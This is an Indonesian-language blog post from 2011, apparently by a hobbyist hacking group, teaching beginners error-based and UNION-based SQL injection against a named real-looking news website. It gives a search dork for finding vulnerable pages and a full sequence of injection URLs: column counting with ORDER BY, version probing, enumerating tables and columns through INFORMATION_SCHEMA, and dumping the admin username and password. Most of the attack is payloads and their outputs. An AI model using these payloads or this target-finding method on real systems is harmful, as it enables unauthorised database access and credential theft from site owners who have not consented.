Untuk pertama kalinya gw mau memberanikan diri untuk posting tentang SQL Injection, soal nya gw juga masih belajar dalam hal ini kalo kiranya gw salah tolong di koreksi dan yang udah master jangan baca postingan ini ini cuma buat newbie kaya gw
DORK
Code: Select all
inurl:news_detail.php?id=
Contoh target
Code: Select all
http://www.lbpl.in/news_detail.php?id=14
masukian tanda petik (')
kurang lebih seperti di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=14'
lalu muncul error seperti
Code: Select all
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk mencari panjang column, dan jangan lupa gunakan -- di belakang angka yang di masukan
contoh nya seperti di bawah ini
http://www.lbpl.in/news_detail.php?id=1 ... 20by%201--
tidak menampilkan eror coba gunakan order by 10 atau 100
kurang lebih nya seperti contoh
Code: Select all
http://www.lbpl.in/news_detail.php?id=14%20order%20by%2010--
order by 10 site mengeluarkan error seperti Unknown column '10' in 'order clause' berarti panjang column tidak sampai 10 coba gunakan order by 5 untuk mengecek nya.. ternyata site masih mengeluarkan error seperti di atas gunakan lagi order by 4 untuk mengecek yang ke 3 kali nya.......... sssttttt site tidak menampilkan error setelah itu gunakan perintah UNION+ALL+SELECT+1,2,3,4-- loh kok cuma sampai 4 karena batas eror nya ada di column 4, jangan lupa gunakan gunakan (-) kurang lebih contoh nya seperti di bawah
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14 union all select 1,2,3,4--
setelah menggunakan perintah UNION+ALL+SELECT+1,2,3,4-- site tidak mengeluarkan error melainkan mengeluarkan angka angka ajaib kenapa di sebut ajaib karena dengan angka itu kita bisa melanjutkan SQLInjection he2
setelah angka muncul gunakan perintah VERSION() column angka, contoh nya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,version(),3,4--
setelah menggunakan perintah VERSION() muncul seperti 5.0.77MM0.1-LOG
ternyata versi 5 beruntung lah gw malam ini ck ck soal nya kalo Versi 4 musti tebak tebak table nya ok masalah versi 4 ntr nyusul lagi
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- di belakang column, perintah tersebut untuk mengetahi nama nama table pada database;) kurang lebih contohnya di bawah ini
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(TABLE_NAME),3,4%20FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
Setelah menggunakan perintah di atas muncul ADMIN,BANNER,CATALOGUE,NEWS,USERS,VIDEO Gunakan table admin, sebelum nya kita meng-konversi dolo table admin menjadi bentuk hexadecimal_sql seperti 0x41444d494e kurang lebih contoh nya seperti
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(column_NAME),3,4%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41444d494e--
setelah itu muncul ID,USERNAME,PASS inilah detik detik menuju ahir ganti Column_name dengan 0x2b,USERNAME,PASS kurang lebih nya lihat contoh yang terahir kali nya....
Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(0x2b,USERNAME,PASS),3,4%20FROM+admin--
nah ahir dari perjalanan ini adalah ADMINADMIN Username = admin Pass = admin
Cukup sampai di sini Tutorial CUPU dari gw kalo ada salah kata atau penempatan tulisan tolong di koreksi, sekian dan Terima kasih.....
cumi++ PekanBaru Cyber Team
Selasa, 01 Februari 2011
Tutorial SQLi
00.08
Zulhelmi Putra
No comments
0 komentar:
Posting Komentar